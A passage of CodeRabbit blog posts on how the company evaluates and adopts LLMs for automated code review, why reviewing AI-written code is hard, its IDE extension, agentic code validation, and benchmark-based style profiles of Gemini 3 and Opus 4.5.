Once a model is stable, the work doesn’t stop. We monitor it constantly through automated alerts and daily evaluation runs that detect regressions long before users do. We also listen, both to our own experience (we use CodeRabbit internally) and to customer feedback. That feedback loop keeps us grounded. If users report confusion, verbosity, or tonal mismatch, we investigate immediately. Every day, we manually review random comment samples from public repos that use CodeRabbit to ensure that quality hasn’t quietly slipped as the model evolves or traffic scales.

## **6\. Why we do all this & why you shouldn’t have to**

![](https://victorious-bubble-f69a016683.media.strapiapp.com/ec70ebd43bfc8237cc4b8cc23557a015848656517cbe1c82b421e177d2c6f70c_502418f0b3.png)

Each new model we test forces us to rediscover what “good” means under new constraints. Every one comes with its own learning curve, its own failure modes, its own surprises. That’s the reality behind the promise of progress.

Could an engineering team replicate this process themselves? Technically, yes.
But it would mean building a full evaluation harness, collecting diverse PR datasets, writing and maintaining LLM-judge systems, defining a style rubric, tuning prompts, managing rollouts, and maintaining continuous regression checks. All of this before your first production review! That’s weeks of work just to reach baseline reliability. And you’d need to do it again every time a new model launches. We do this work so you don’t have to. Our goal isn’t to let you pick a model; it’s to make sure you never have to think about it. When you use CodeRabbit, you’re already getting the best available model for each task, tuned, tested, and proven under production conditions. Because “choosing your own model” sounds empowering until you realize it means inheriting all this complexity yourself. ## **Takeaway** Model adoption at CodeRabbit isn’t glamorous. It’s slow, meticulous, and deeply technical. But it’s also what makes our reviews consistent, trustworthy, and quietly invisible. Every diff you open, every comment you read, is backed by this machinery. Weeks of evaluation, thousands of metrics, and countless prompt refinements all in service of one thing: Delivering the best possible review, every time, without you needing to think about which model is behind it. Try out CodeRabbit today. [Get a free 14-day trial!](https://app.coderabbit.ai/login???free-trial)

It's harder to read code than to write it (especially when AI writes it)

Aleks Volochnev — Thu, 04 Dec 2025 00:00:00 GMT

*"Debugging is twice as hard as writing the code in the first place. Therefore, if you write the code as cleverly as possible, you are, by definition, not smart enough to debug it."* * Brian Kernighan (co-creator of Unix and co-author of *The C Programming Language*) I've been programming since I was ten. When it became a career, I got obsessed with code quality: clean code, design patterns, all that good stuff. My pull requests were polished like nobody's business: well-thought-out logic, proper error handling, comments, tests, documentation. Everything that makes reviewers nod approvingly. Then, LLMs came along and changed everything. I don't write that much code anymore since AI does it faster. Developer’s work now mainly consists of two parts: explaining to a model what you need, then verifying what it wrote, right? I’ve become more of a code architect and quality inspector rolled into one. And here came a problem I knew all too well from my years as a tech lead: ## **READING CODE IS ACTUALLY HARDER THAN WRITING IT.** As an open-source maintainer and senior developer, I had to review tons of other people's code, and I learned what Kernighan said the hard way. Reading unfamiliar code is exhausting. You have to reverse-engineer someone else's thought process, figure out why they made certain decisions, and consider edge cases they might have missed. With my own code, reviewing and adjusting were a no-brainer. I designed it, I wrote it, and the whole mental model was still fresh in my head. Now the code is coming from an LLM and suddenly reviewing "my own code" has become reviewing someone else's code. Except this "someone else" writes faster than I can think and doesn't take lunch breaks. AI is supposed to help, but if I want to ship production-grade software now, I actually have more hard work to do than before. The irony! And that’s why, for my first blog post since joining CodeRabbit, I wanted to focus on that fact. 
This is also, incidentally, why I decided to join CodeRabbit. But we’ll get to that part later.

## **We’re human (unfortunately for code quality)**

Here's where things get uncomfortable: we're human beings, not code-reviewing machines. And human brains don't want to do the hard work of thoroughly reviewing something that a) already runs fine, b) passes all the tests, and c) someone else will review anyway. It's so much easier to just `git commit && git push` and go grab that well-deserved coffee. Job done!

I went from “writing manually and shipping quality code” to “generating code fast but shipping… bad code!” The quality didn't drop because I had less time. I actually had MORE time, since I wasn't typing everything myself. I just tended to “shorten” the verification phase, telling myself "it works, the tests pass, the team will catch anything major."

## **The problem with "Catching it in review"**

At this point, I was already using CodeRabbit to review my team's pull requests (as an OSS-focused dev, I was an early adopter), and those reviews were genuinely helpful! CodeRabbit would catch things that slipped through: security issues, edge cases, some logic bugs. The kind of problems that are easy to miss when you're moving fast.

But here's the thing: those reviews were coming too late. The code was already pushed. Already in the repository, visible to the entire team. Sure, CodeRabbit would flag the issues and I'd fix them, but not before my teammates had seen my AI-generated code with obvious problems that I hadn't bothered to review properly. That's not a great look when you've spent decades building a reputation for quality.

## **Enter: CodeRabbit in an IDE**

Then, I discovered CodeRabbit had an IDE extension. The AI code reviewer I was already using for PRs could also review my code locally, before anything hits the repo. This was exactly what I needed.
When I ask CodeRabbit to check my changes, or simply stage them, it reviews them right in VS Code, catching issues before `git push`. Now, my team sees only the polished version, just like the old days. Except now, I'm shipping AI-generated code at AI speeds. And I’m doing it with actual quality control. Automatic reviews mean no willpower required: I don't have to remember to run it, I don't have to open a separate tool. It just happens at commit time. Reviewing doesn't feel like plowing in the rain anymore.

![](https://victorious-bubble-f69a016683.media.strapiapp.com/fef507493ad981dade7d84775035d329e65aced71a7d6feea1b2a0d8e126a955_29128522d4.png)

This gets critical when you're looking at potential security headaches, like the one in the screenshot. CodeRabbit caught an access token leak that could've been a total disaster! Issues like this need to be addressed *before* the code gets pushed to a repository.

![](https://victorious-bubble-f69a016683.media.strapiapp.com/ba3e3810050af63aa71a693b7f84aba07192e9b7b4412ce1e34556abb4a6ef98_a4754d2807.png)

More than that, when it finds something, the fixes are committable. The tool doesn’t tell me to "go figure it out" but gives actual suggestions I can apply immediately, in one click.

![](https://victorious-bubble-f69a016683.media.strapiapp.com/3212882caf7ec4866957dcad2fdba201e22d8a7d25373f4cb331c60df70fe486_3d806c5351.png)

For more advanced cases that can’t be resolved with a simple fix, the CodeRabbit IDE extension writes a prompt that it sends to an AI agent of your choice. Fun fact: CodeRabbit is so good at writing prompts that I've learned a lot from them and improved my own prompt engineering skills!

![](https://victorious-bubble-f69a016683.media.strapiapp.com/0d5ee85da24eb22abc0a511394ae7972550df2d01435577e4af25da22ca19092_19ac25ce2a.png)

Even the free CodeRabbit IDE Review plan offers incredibly helpful feedback and catches numerous issues.
However, the Pro plan unlocks its true power, providing the same comprehensive coverage you expect from regular CodeRabbit Pull Request reviews: tool runs, Code Graph analysis, and much more. There is a huge infrastructure behind every check!

![](https://victorious-bubble-f69a016683.media.strapiapp.com/7f7f3d3a14d84f1146fc53d54c6dc1e4155bbb04bc24ceeaad5a59443c38db38_740bfaa782.png)

## **The bottom line**

Brian Kernighan was right: reading code is harder than writing it. That was true in 1974, and it's even more true now, when AI can generate 300 lines while you're still thinking about a variable name.

We thought AI would make our jobs easier. And it does… if you only count the writing. But the reading, meaning verifying, reviewing, and understanding what the AI agent actually built? That got harder. Many of us are doing 10x the volume at 10x the speed, which means 10x more code to read with the same human brain that gets lazy and wants coffee breaks.

The solution isn't to slow down or go back to typing everything manually. The solution is to automate the code review process as thoroughly as we automated the code writing process. If your AI writes the code, another AI should be reading it before you get to it.

The quality of the reviews is why I recently transitioned from being a CodeRabbit user to joining the team. And that’s why you should also try [CodeRabbit in your IDE](https://docs.coderabbit.ai/code-editors). The free tier means there's basically no excuse not to try it. Your reputation will thank you.

***Get started today with a*** [***14-day free trial!***](https://app.coderabbit.ai/login???free-trial)

Gemini 3 for code-related tasks: The dense engineer

David Loker — Wed, 26 Nov 2025 00:00:00 GMT

**TL;DR:** It doesn’t just write patches; it writes a complete argument for every change. When [Gemini 3](https://youtu.be/ou1sNnSeM4E?si=Nxi82RCQwwIZq9Vk) is right, it’s spectacularly right. When it’s wrong, it still sounds right.

### **Every model writes in our house style. Gemini 3 rewrites the rules.**

![](https://victorious-bubble-f69a016683.media.strapiapp.com/f220ace5650161185e6e7437d028f19e0b9587db9a278fd9902605300beafb0f_f37708dd0e.png)

All of CodeRabbit’s models follow the same structural blueprint: a short headline, an explanation, and a patch. However, Gemini 3 uses that frame differently. It fills every inch of space with evidence, preconditions, and causal reasoning. Each review reads like a technical brief wrapped around a diff.

<https://youtu.be/ou1sNnSeM4E?si=WRfez1XIkIJ8F955>

Gemini 3 is confident, detailed, and relentlessly specific. Its comments read like they were written by a senior engineer who wants to fix the issue and demonstrate *why* the fix is necessary. That density is its defining trait. Every comment feels significant, even the ones you might not ultimately act on.

## **Benchmarking context for Gemini 3**

![Here is how CodeRabbit benchmarked Gemini 3](https://victorious-bubble-f69a016683.media.strapiapp.com/30edd8c05d1b83f5595a74a585d35a7d50f13bc9ecdcf36322670314d4bf6e36_0a5bb919e0.png)

We evaluated Gemini 3 using CodeRabbit’s standard benchmark: 25 pull requests seeded with known error patterns (EPs) across C++, Java, Python, and TypeScript. Each comment was scored by multiple LLM judges and hand-validated by our engineers. We measured precision, important-share, and signal-to-noise ratio (SNR), the same metrics used in all of our model evaluations. We also assessed tone, length, and style, since how a model *communicates* can affect whether developers accept its suggestions.
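As a rough illustration of how the three headline metrics relate to each other, the sketch below computes them from a list of scored comments. The definitions are assumptions, not CodeRabbit's published formulas: precision is taken as the share of comments judged correct, important-share as the share rated critical or major, and SNR as the ratio of important to unimportant comments. The `ScoredComment` type and the sample data are hypothetical.

```python
from dataclasses import dataclass

# Severities counted as "important" (assumed to mean critical or major).
IMPORTANT = {"critical", "major"}


@dataclass(frozen=True)
class ScoredComment:
    """A review comment after judging (hypothetical record)."""
    severity: str  # e.g. "critical", "major", "minor"
    passed: bool   # True if the comment was judged correct


def summarize(comments: list[ScoredComment]) -> dict[str, float]:
    """Return precision, important-share, and SNR under the assumed definitions."""
    total = len(comments)
    if total == 0:
        raise ValueError("need at least one comment")
    important = sum(1 for c in comments if c.severity in IMPORTANT)
    unimportant = total - important
    return {
        "precision": sum(1 for c in comments if c.passed) / total,
        "important_share": important / total,
        # Ratio of important to unimportant comments; infinite if nothing is noise.
        "snr": important / unimportant if unimportant else float("inf"),
    }


# Hypothetical sample: six important comments, two minor ones, four judged correct.
sample = (
    [ScoredComment("critical", True)] * 2
    + [ScoredComment("major", True)] * 2
    + [ScoredComment("major", False)] * 2
    + [ScoredComment("minor", False)] * 2
)
summary = summarize(sample)
```

For this sample the result is a precision of 0.5, an important-share of 0.75, and an SNR of 3.0. Under this assumed definition the two ratios are tied together: an SNR of `s` corresponds to an important-share of `s / (1 + s)`.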
![Gemini 3 vs GPT-5.1 and Opus 4.5 and Sonnet 4.5](https://victorious-bubble-f69a016683.media.strapiapp.com/c18b66eeda50f25ef5bd4833b56d2cfef383f852ca34f2ea34d4098b36a30029_6858e50db6.png) **Interpretation:** Gemini 3 sits in the middle of the group for precision but provides excellent real-bug coverage. Roughly three of every four comments are important (critical or major). Its SNR of 3.2 puts it close to Opus 4.5 in reliability, but Gemini 3 expresses itself with greater conviction and detail. ### **Style and Tone of Gemini 3** ![Style and tone of Gemini 3 vs GPT-5.1 and Opus 4.5 and Sonnet 4.5](https://victorious-bubble-f69a016683.media.strapiapp.com/e70aff55d7108331f7fa97a97577f522cc98c6792b2c6aaff8a418bb4ff0fe1f_a31ce45961.png) **Tone summary:** Gemini 3 is the most assertive of the four. It communicates with confidence, and for the most part, that confidence is justified. Even when it makes a mistake, the comment sounds credible enough to make developers stop and re-check the code, which may add to its practical value but may be confusing for some. ![Gemini 3 Style and tone](https://victorious-bubble-f69a016683.media.strapiapp.com/c75c3614192783283fe4700ce8042d39776dd184d5a24cdfb64c8eb80f8b0554_3a274a46ff.png) ### **The dense engineer personality of Gemini 3** Gemini 3 compresses an exceptional amount of reasoning into compact comments. The average comment is only 16 lines long, yet each one unpacks a complete causal chain: *what broke, why it happened, and how to fix it.* For example, in a concurrency issue found in a C++ worker pool, Gemini 3 doesn’t simply say “missing lock.” It reconstructs the sequence: unlock, wait, missed signal, dead thread. Then it provides a single-line patch that resolves the race. In another TypeScript review, the model identifies that MAX\_SAFE\_INTEGER disables cache eviction, explains the performance risk, and proposes an LRU fallback. These are not stylistic suggestions. These are corrections that improve program reliability. 
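The cache-eviction finding is easier to picture with code. The sketch below is a Python analogue, not the TypeScript code from the benchmark PR: a small LRU cache whose `max_entries` limit controls eviction. The class name, the parameter, and the limits used are hypothetical. Setting the limit to an effectively unbounded value (`sys.maxsize` plays the role of `MAX_SAFE_INTEGER` here) means the eviction branch never runs in practice, so the cache grows with every new key.

```python
import sys
from collections import OrderedDict
from typing import Any, Hashable


class LRUCache:
    """Least-recently-used cache with a hard entry limit (illustrative sketch)."""

    def __init__(self, max_entries: int) -> None:
        if max_entries < 1:
            raise ValueError("max_entries must be at least 1")
        self.max_entries = max_entries
        self._data: OrderedDict = OrderedDict()

    def get(self, key: Hashable, default: Any = None) -> Any:
        if key not in self._data:
            return default
        self._data.move_to_end(key)  # mark as most recently used
        return self._data[key]

    def put(self, key: Hashable, value: Any) -> None:
        self._data[key] = value
        self._data.move_to_end(key)
        # Evict from the least recently used end until we are within the limit.
        while len(self._data) > self.max_entries:
            self._data.popitem(last=False)

    def __len__(self) -> int:
        return len(self._data)


# Bounded cache: the least recently used key is evicted.
bounded = LRUCache(max_entries=2)
bounded.put("a", 1)
bounded.put("b", 2)
bounded.get("a")     # "a" is now more recent than "b"
bounded.put("c", 3)  # evicts "b"

# "Unbounded" cache: the limit is so large that nothing is ever evicted.
unbounded = LRUCache(max_entries=sys.maxsize)
for i in range(1000):
    unbounded.put(i, i)
```

After these calls the bounded cache holds only `"a"` and `"c"`, while the unbounded one still holds all 1,000 entries. That is the performance risk in miniature: memory use tracks the number of distinct keys rather than a chosen limit.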
This combination of density and accuracy defines Gemini 3’s personality. Every comment is an argument, and most of those arguments hold up under scrutiny. ### **What Gemini 3 feels like in review** ![Gemini 3 reviews](https://victorious-bubble-f69a016683.media.strapiapp.com/9b2eddfd78a4edf5e54b00f194a0665a13b4dbd80d24b5fe1f25aee7e8348f2c_cc42c65829.png) Reading Gemini 3 feels distinct from reading any other reviewer. It is confident and structured, but its reasoning is particularly dense. Each comment reads like a detailed technical review from a lead engineer who insists on context before approving a change. Comments often open with a directive such as “Fix this race condition,” then expand into a clear explanation, referencing specific files and ending with a patch. The result feels like an expert walking you through both the problem and the fix. Developers describe Gemini 3 as a reviewer that sounds sure of itself and provides evidence to support its claims. Its direct tone can feel intense, especially compared to GPT-5.1’s measured precision or Opus 4.5’s calm logic. However, each comment feels like a mini design review, explaining what to change, why it matters, and what trade-offs exist. The model’s high information density requires careful reading, but it provides proportionate insight. Even when wrong, Gemini 3 often reveals something valuable about hidden edge cases or architectural assumptions. ### **What the numbers show** **1\. Density correlates with correctness.** Longer comments (top half by length) pass more often, with 53% precision compared to 34% for shorter comments. Important comments (critical or major) average **847 characters**, nearly twice the size of unimportant ones (**442**). When Gemini 3 takes time to elaborate, it is typically accurate. **2\. Tone tracks severity.** Assertiveness rises with severity: **92%** of major and **67%** of critical comments are assertive, while only **36%** of minor comments are. 
Hedging increases to **36%** on minor issues. The model uses its strongest voice for the most serious problems, which makes it effective for triage. **3\. Confidence correlates with quality.** Assertive comments pass more frequently (**47.6%**) than neutral (**36%**) or hedged (**33%**) ones. Gemini 3’s confidence is generally supported by evidence rather than overstated. **4\. Patches indicate reliability.** When a diff or code block appears, the precision rate improves. Over **70%** of assertive comments contain diffs, compared with only **17%** of hedged comments. The presence of a patch often signals that the model’s reasoning is grounded in the actual code. ### **What it gets right** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/a8435696083c8e6e6ed13236b8739b6c408ba1b505f689ed96a2fd45f9e356a4_57565c8244.png) Gemini 3’s strongest areas are concurrency and system correctness. It frequently detects interleaving and synchronization issues that other models overlook. It excels at diagnosing the *why* behind a bug: * **Thread-safety:** Describes lost wakeups and inconsistent locking with narrative precision, then offers a concise patch. * **Lifecycle management:** Identifies missing shutdown hooks or unclosed resources and recommends explicit cleanup. * **Algorithmic stability:** Corrects comparator logic and off-by-one ranges to restore invariants. * **System configuration:** Finds default values that disable expected behavior and recommends practical limits. Each of these shows how Gemini 3’s detailed reasoning leads to direct, verifiable fixes. ### **When it overreaches** Gemini 3’s conviction can occasionally go too far. On stylistic or low-severity issues, it may overstate importance. Some comments labeled “Critical” are actually minor or aesthetic. Its assertive tone can make small findings sound urgent. This model performs best when paired with experienced reviewers who can distinguish critical bugs from overconfident advice. 
Even its overreaches tend to highlight genuine inefficiencies or readability concerns. Few comments are without value.

### **Why density matters**

Gemini 3 trades brevity for understanding. It does not simply provide a fix; it delivers a short investigation. This depth makes it particularly valuable for large, complex systems.

Precision measures whether a model hits the target, but density measures how much a developer learns by reading it. In production environments, that difference matters. A concise reviewer like GPT-5.1 delivers quick, targeted notes. Gemini 3, by contrast, provides comprehensive reasoning that increases confidence and reduces the likelihood of missing subtle defects.

Let's put it this way: *“You don’t skim Gemini 3. You study it.”*

### **Practical guidance: When to use Gemini 3**

| **Use it when...** | **Because...** |
| --- | --- |
| You are reviewing concurrency-heavy or resource-sensitive code | It excels at identifying synchronization and lifecycle issues. |
| You want depth over brevity | Longer, more detailed comments correlate with accuracy. |
| You need actionable patches | Around 65% of comments include ready-to-apply diffs. |
| You can manage an assertive tone | Its confidence is helpful but occasionally overstated. |
| You are mentoring newer developers | Each comment serves as both a fix and an educational note. |

Gemini 3 is not ideal for superficial or stylistic reviews. It is best used when precision, explanation, and insight are more important than speed.

### **Closing thoughts: The shape of Gemini 3’s reasoning**

Gemini 3 does more than fix code; it presents a logical case for every fix. Each comment is a complete story of cause, effect, and resolution. When it is correct, it feels like reading a senior engineer’s deep-dive analysis. Even when it is wrong, it provides insight into how to think about the problem.
**Takeaway**: If GPT-5.1 is the decisive teammate and Opus 4.5 the disciplined architect, Gemini 3 is the dense engineer who delivers a fully reasoned diff that is confident, comprehensive, and intent on proving its point.

***Want to try out CodeRabbit?*** [***Get a 14-day free trial!***](https://coderabbit.link/PZ2w3mZ)

How CodeRabbit's Agentic Code Validation helps with code reviews

Ewa Szyszka — Tue, 25 Nov 2025 00:00:00 GMT

The [2025 Stack Overflow survey](https://survey.stackoverflow.co/2025/) reveals a paradox: while 84% of developers express confidence in adopting AI tools, nearly half (48%) still distrust the accuracy of their outputs. This tension between optimism and skepticism has reshaped how teams think about quality assurance. ![2025 Stack Overflow survey 48% of developers still distrust the accuracy of their outputs](https://victorious-bubble-f69a016683.media.strapiapp.com/ee7e860f6707919f9ff0ae4a26d3561373b6db38e6872c52a132ad7c28b6f0b1_320f3d4133.png) ## **From PRD to PR in days (not weeks)** The bottleneck in software development has fundamentally shifted from writing code to validating it. In the early days of AI-assisted development, the workflow was straightforward: AI suggested code, humans read the suggested snippet and then decided whether or not to accept that suggestion. Tab completion wrote boilerplate. Copilot suggested functions. But a senior engineer still manually validated and chose each line of code to ensure its quality, structure, and safety before making a pull request. Today's reality is different. Advanced reasoning models like OpenAI's o1 can decompose complex requirements and generate entire features. This set the flywheel in motion for the era of agentic code generation, where humans along with agents play an active role in generating large swaths of code. The difference between accepting AI-generated code one snippet at a time and adding in AI-generated features is significant. Devs are more likely to miss issues with its quality, structure, and safety. Reviewing AI-generated code also takes much more time. The bottleneck isn't writing code anymore - it's trusting it. 
## **The AI-generated code crisis nobody's talking about**

![](https://victorious-bubble-f69a016683.media.strapiapp.com/e8fc30da09029c65abfa651f08202a821bf2b4ef92102d1c996fa345a3c0872d_86065a1daa.png)

Engineers are right to be skeptical, since [**over 40% of AI-generated code still contains security flaws**](https://cyber.nyu.edu/2021/10/15/ccs-researchers-find-github-copilot-generates-vulnerable-code-40-of-the-time/). Here is what AI-generated code often gets wrong:

* **Dependency explosion**: A simple prompt for a "to-do list app" can generate 2-5 backend dependencies depending on the model. Each dependency expands your attack surface. Worse, models trained on older data suggest libraries with known CVEs that were patched after their training cutoff.
* **Hallucinated dependencies**: AI invents package names that don't exist. Attackers register those names in public repositories with malicious code. Developers install them blindly. This attack vector, called "slopsquatting," is uniquely enabled by AI code generation.
* **Architectural drift**: The AI swaps out your cryptography library, removes access control checks, or changes security assumptions in ways that look correct but behave insecurely. These are the bugs that static analysis misses and humans don't catch until production.

## **Why did reasoning models change everything?**

A few years back, applying AI to a collaborative workflow like code review was met with a degree of amused skepticism. The bots would catch your missing semicolons, flag unused variables, and maybe (if you were lucky) warn you about a potential null pointer. They were fast, cheap, and fundamentally shallow.

At CodeRabbit, when we started to apply generative AI, we recognized this problem early and developed a technique, visible on some of our older PRs, called monologue, in which the model thinks through the issue and shares the reasoning behind an issue comment.
With the launch of reasoning models like OpenAI’s o1 and o3 the models actually think through the problem thanks to the **monologue feature** on CodeRabbit. When you ask GPT-4o to review code, it pattern-matches against things it's seen before and code review feedback is mostly superfluous. When you ask GPT-5 or Claude Sonnet 4.5, it spends time reasoning through your code's logic, tracing execution paths, considering edge cases, and understanding intent. This was important for successful code review. But there is a catch! ## **What makes code review more "agentic"?** Many thought that applying the same reasoning models to review the code they generated would cut slop or find bugs, but this wasn't entirely true. The two major missing pieces were effective context assembly (context engineering) and verifying the veracity of the results. Traditional code validation tools are reactive. You run a linter, it tells you about unused variables. You run a static analyzer, it warns about null pointer exceptions. You run security scanners, they flag hardcoded secrets. Each tool does one thing, in isolation, with no context about what you're actually trying to build. With generative AI, you might integrate these tools into your review pipeline. However, neither the model nor the tools are intelligent enough to effectively filter out noise and highlight crucial signals, leading to context clogging. To effectively counter that, we developed techniques to engineer and manage the context for each model in the review pipeline. For example: We would prepare the list of most important issues suggested by all the tools in an instructive manner to the reasoning model, for better solutions. We also added a verification agent that checks and grounds the review feedback. Here are some examples from the open-source PRs. **Static analysis**: AST parsing with tools like ast-grep to understand code smells. 
![](https://victorious-bubble-f69a016683.media.strapiapp.com/b8b0787dd36f7c2860133a6a6dfd2e911731ad566628f2d774bb5a33757e3d9f_4fa64c8fc8.png)

![](https://victorious-bubble-f69a016683.media.strapiapp.com/b6a7bf4e18c84ccf407d65bd4a33c797fc0c7c014af2955871370817d32882e6_d977a0c061.png)

**Incremental analysis**: Only validating what changed, not your entire codebase.

![](https://victorious-bubble-f69a016683.media.strapiapp.com/6651566b1e253c95f62767b663a2eb761c41889b88fbb8de0e8bba678a8c72f3_ec384536e0.png)

![](https://victorious-bubble-f69a016683.media.strapiapp.com/450fe46203c9ee8c511b09fac7e4fae07d36b86bb797ba8fb984bc85178ca498_8065dbfbc9.png)

**Security issues**: Prompt injection attacks and edge case generation.

![](https://victorious-bubble-f69a016683.media.strapiapp.com/e314fe102042ac1c338927cd439a5d7cbde6b864184d5c1932486df28857cf83_ecab733dd0.png)

**Name refactoring**: Suggesting better variable and function names based on usage.

![](https://victorious-bubble-f69a016683.media.strapiapp.com/0620d243a573ec072f190ae01c9a5fae61ca9a666462796cda76fc5016d60a76_d8cc8f63fe.png)

The "agentic" part means the AI decides which tools to run, interprets the results, and takes action. Think of it like having a senior engineer who knows when to dig deeper and when something is *not* fine.

## **How CodeRabbit closes the AI code trust gap**

Instead of chasing higher benchmark scores or relying on traditional metrics, CodeRabbit focuses on how AI systems actually perform in live engineering environments through custom evaluation methods, some visible directly on the PRs we review.
The technique of agentic code validation happens on each pull request reviewed by CodeRabbit; however, everything runs in **isolated, sandboxed environments**, what we call “tools in jail.” As described in our [Security Posture](https://www.coderabbit.ai/blog/our-security-posture-how-we-safeguard-your-repositories), this approach ensures that verification agents can safely execute, inspect, and even stress-test code without ever compromising user data or infrastructure integrity.

Agents excel at catching common vulnerabilities, analyzing patterns across thousands of lines, and running comprehensive test suites. They're designed to surface issues that are tedious or time-consuming for humans to catch manually.

But agentic code validation isn't going to replace code reviews entirely. Instead, it frees developers to focus on what humans do best: architectural reasoning, business logic validation, and nuanced security considerations. The human-in-the-loop and agent-in-the-loop processes can coexist, providing redundancy and complementary reasoning similar to peer programming.

***Want to see agentic validation in action? Sign up for a*** [***14-day CodeRabbit trial.***](https://coderabbit.link/nFI6lmf)

Opus 4.5 for code-related tasks: Performs like the systems architect

David Loker — Mon, 24 Nov 2025 00:00:00 GMT

## **Every model reasons. Opus 4.5 audits.** Every new model arrives with the same promise: smarter reasoning, cleaner code, and better answers. But Opus 4.5 from Anthropic doesn’t just reason; it *audits*. It reads code as if returning to a system it helped design, identifying weak points and refining architecture. Where other models narrate their logic or prescribe surgical fixes, Opus 4.5 performs structured, systematic reviews that feel more like technical documentation than conversation. We integrated Opus 4.5 into CodeRabbit’s benchmark harness to understand what makes this model distinct. The result was not higher raw intelligence or flashier prose, but discipline. This model doesn’t just find bugs; it *builds context* around them. It treats review as an engineering process, rather than a guessing game. ![Opus 4.5 vs. GPT 5.1 and Sonnet 4.5](https://victorious-bubble-f69a016683.media.strapiapp.com/e2f436e1339c66056dfbd4a7a9c2f779cd815e082f7b23dfe52e96ddda4e1f59_6ddfa561bb.png) ## **Benchmarking context for Opus 4.5** ![Opus 4.5 benchmarking context](https://victorious-bubble-f69a016683.media.strapiapp.com/601a64a018c8b97d86f8fdc489fecf27e1eb61b0db89b7841eef34454b415f01_151a4483dc.png) At CodeRabbit, we evaluate new LLMs using a controlled benchmark of **25 complex pull requests** seeded with known error patterns (EPs) across C++, Java, Python, and TypeScript. Each comment generated by a model is scored by an LLM judge for three key factors: * **Precision:** Whether it correctly identifies the EP. * **Important-share:** The percentage of comments that are genuinely critical or major (real bugs, not style issues). * **Signal-to-noise ratio (SNR):** The ratio of important to unimportant comments. Our evaluation framework, refined over multiple generations of models, combines automated LLM judging with **hand validation** to ensure accuracy. We also use **multiple judges and repeated trials** to measure consistency and understand variance. 
Each iteration improves the process through better prompts, refined labeling, and expanded coverage, resulting in more reliable outcomes. ## **Scoreboard (Actionable comments only)** ![Opus 4.5 vs GPT 5.1 and Sonnet 4.5](https://victorious-bubble-f69a016683.media.strapiapp.com/f990cdf91d1adb4bde1755d893b2fa42178505a515f5d080b6468afd48021031_3f6c16a7b1.png) **What this means:** Opus 4.5 sits between Sonnet 4.5’s high-volume, verbose style and GPT-5.1’s lean, surgical precision. It delivers higher per-comment precision and a greater share of meaningful findings than Sonnet 4.5. While it recorded one fewer EP pass (15 vs. 16), that difference falls within normal variance. In several runs, Opus 4.5 matched or even surpassed both GPT-5.1 and Sonnet 4.5. The takeaway is a model that balances signal, structure, and coverage with consistent reliability. ## **Style and tone of Opus 4.5** ![Opus 4.5 vs GPT 5.1 and Sonnet 4.5](https://victorious-bubble-f69a016683.media.strapiapp.com/ecdc4f4032514f950ff9acb7df79c7b3f2c2707c2f920ea83f89bec1963bdde1_129eb1004d.png) Opus 4.5’s reviews are structured, concise, and focused. With assertiveness around 33% and hedging near 15%, its tone reads as measured and professional. The balance of tone and density gives it an analytical voice that feels practical and confident. The high use of code blocks and diff patches underscores its bias toward action; it talks less and *edits more*. ![Opus 4.5 style and tone ](https://victorious-bubble-f69a016683.media.strapiapp.com/fbf7956b821b024bd933a1358bba7e873b6b743a4841a0e9b87d9e7d3483c211_3da751739f.png) ## **Structured intelligence: Predictable form and cross-language consistency** Opus 4.5’s comments follow an architectural rhythm of headline, rationale, and diff. Nearly 80% include code blocks, and most conclude with a concise patch. Each resembles a clear bug report that specifies cause, effect, and resolution. This structure holds across languages. 
Whether reviewing C++, Java, Python, or TypeScript, the cadence remains consistent, averaging 19 lines and 790 characters per comment. This uniformity simplifies automation and enhances readability. It also makes Opus 4.5 feel like a single engineer’s consistent voice across an entire codebase. * *C++ (WorkerThreadPool):* Detects a lost wakeup race with a three-step interleaving and a one-line diff fix. * *Java (OrderService):* Flags a missing volatile on a double-checked lock and provides the corrected pattern. * *Python (Batch client):* Replaces a synchronous HTTP client with an asynchronous equivalent to prevent blocking calls. * *TypeScript (Cache manager):* Identifies that Number.MAX\_SAFE\_INTEGER disables eviction and suggests realistic defaults. These are concise, code-native insights, each actionable and grounded in sound reasoning. ## **The confidence inversion** Opus 4.5’s tone is balanced but occasionally reveals a subtle inversion: when it is wrong, it can sound slightly more certain. Although the model is generally measured, this behavioral quirk means tone alone is not always a reliable indicator of correctness. To account for this, we pair tone data with correctness metrics in evaluation summaries to maintain consistent calibration. Opus 4.5 rarely speculates; it simply explains, even when it’s wrong. ## **System-level reasoning: Fixing context, not just code** While most models target the immediate defect, Opus 4.5 focuses on the surrounding system. Its recommendations frequently adjust lifecycles, add safety checks, or refine defaults. Examples: * **TypeScript Cache:** Rewrites eviction logic, adds TTL enforcement, and updates defaults to prevent silent OOM. * **Java OrderService:** Replaces HashMap with ConcurrentHashMap and identifies missing ExecutorService shutdown. * **Python Client Lifecycle:** Adds explicit shutdown hooks for long-lived async clients. 
* **C++ FileAccessEncrypted:** Resolves a validation bug that blocked all encrypted files and improves upstream error handling. These are not single-line fixes but systemic corrections. The model treats code as an interconnected ecosystem rather than a collection of isolated issues. ## **Cost, effort & efficiency** Anthropic’s Effort parameter provides direct control over how deeply the model reasons. In high-effort mode, Opus 4.5 explores every dependency path. In medium-effort mode, it trims reasoning depth to save tokens. Even with high-effort reasoning, its reviews averaged about 25% fewer output tokens than Sonnet 4.5, balancing higher per-token costs ($25 per million output tokens) with greater efficiency. This disciplined structure pays for itself by producing fewer digressions and maintaining consistent clarity. ## **What it feels like to read Opus 4.5** ![Reviews of Opus 4.5](https://victorious-bubble-f69a016683.media.strapiapp.com/4b00e475fdcf8f13179fe4897d32e1ce78e146d69c6ab88726464c41fe6d43be_8fd7b18186.png) If Sonnet 4.5 feels like a teacher and GPT-5.1 like a decisive teammate, Opus 4.5 is the **architect reviewing your PR**. Its tone is calm and deliberate, never commanding. It assumes you understand the domain and aims to confirm the details. The result is feedback that reads like peer review from a systems engineer: consistent, structured, and quietly authoritative. ### **Tone and personality** Opus 4.5’s voice is measured and analytical. It rarely uses dramatic language or unnecessary severity. Instead, it conveys certainty through order, concise summaries, specific evidence, and focused corrections. The tone builds trust, delivering feedback that feels like it comes from a mentor familiar with your system. ### **Depth vs. density** Its comments are compact yet informative. When an issue warrants detailed explanation, Opus 4.5 delivers it without excess. For simpler problems, it resolves them with brief, precise advice. 
